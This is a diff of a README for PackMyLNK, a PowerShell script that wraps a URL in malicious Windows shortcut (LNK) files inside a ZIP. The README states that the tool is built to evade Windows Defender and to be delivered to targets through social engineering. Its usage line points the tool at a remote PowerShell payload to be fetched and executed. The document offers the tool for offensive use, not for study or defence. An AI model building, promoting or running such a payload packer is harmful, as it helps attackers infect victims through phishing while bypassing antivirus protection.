CalfCrusher/PackMyLNK/README.md

 # PackMyLNK
-A simple Zip packer to bypass Windows Defender for malicious LNK files

 This script takes a URL as input and embeds it into a classic kill chain using LNK files.
-I developed it with the explicit purpose of evading detection by Windows Defender.
+I designed it with the specific intent of avoiding detection by Windows Defender.
+It generates a final ZIP file, ready to be delivered to the target using Social Engineering techniques.

 ## Usage
 `.\PackMyLNK.ps1 -Url http://example.com/payload-to-execute.ps1`